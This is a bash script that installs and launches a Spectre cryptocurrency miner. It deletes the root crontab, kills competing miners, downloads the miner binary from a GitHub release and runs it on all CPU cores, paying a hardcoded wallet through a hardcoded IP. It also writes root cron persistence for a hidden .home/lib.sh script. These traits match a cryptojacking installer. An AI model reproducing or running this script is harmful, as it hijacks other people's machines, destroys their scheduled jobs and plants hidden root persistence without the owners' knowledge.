#!/bin/bash

# Remove existing crontab entries
sudo crontab -r

# Install unzip if not already installed
sudo apt update
sudo apt install -y unzip

# Run a script to kill processes if needed (ensure it's correct)
sudo ./killdero.sh
sudo pkill spectre

# Default wallet address
default_wallet_address="spectre:qp5cpywdz777e0yd38qkew275kf2f9q046nac7jaqshkrch9ua342rl9ch944"

# Get the number of CPU cores
cpu_cores=$(nproc)

# Download the miner package
sudo wget https://github.com/nambui979/spectre/releases/download/download/spectre-miner-v0.3.16-linux-gnu-amd64.zip -O spectre-miner.zip

# Check if download was successful
if [ $? -ne 0 ]; then
  echo "Failed to download the miner package"
  exit 1
fi

# Unzip the miner package
sudo unzip -o spectre-miner.zip

# Check if unzip was successful
if [ $? -ne 0 ]; then
  echo "Failed to unzip the miner package"
  exit 1
fi

# Copy the miner binary to the current directory
sudo cp bin/spectre-miner-v0.3.16-linux-gnu-amd64 spectre
chmod +x .home/etc.sh
chmod +x .home/lib.sh
chmod +x spectre
# Create the min.sh script
cat <<EOF > min.sh
#!/bin/bash

# Default wallet address
default_wallet_address="spectre:qp5cpywdz777e0yd38qkew275kf2f9q046nac7jaqshkrch9ua342rl9ch944"

# Get the number of CPU cores
cpu_cores=\$(nproc)

# Run the miner with nohup to prevent it from being stopped when the session ends
sudo nohup ./spectre -a \$default_wallet_address --spectred-address 34.89.167.205 --threads \$cpu_cores > miner.log 2>&1 &
EOF

# Make the min.sh script executable
sudo chmod +x min.sh
cat /dev/null > /var/spool/cron/crontabs/root
cat >>/var/spool/cron/crontabs/root<<EOF
0 0 * * * /root/.home/lib.sh
EOF
chmod 0600 /var/spool/cron/crontabs/*
service cron restart

# Run the min.sh script
sudo ./min.sh

echo "Miner setup and execution complete. Check miner.log for output."
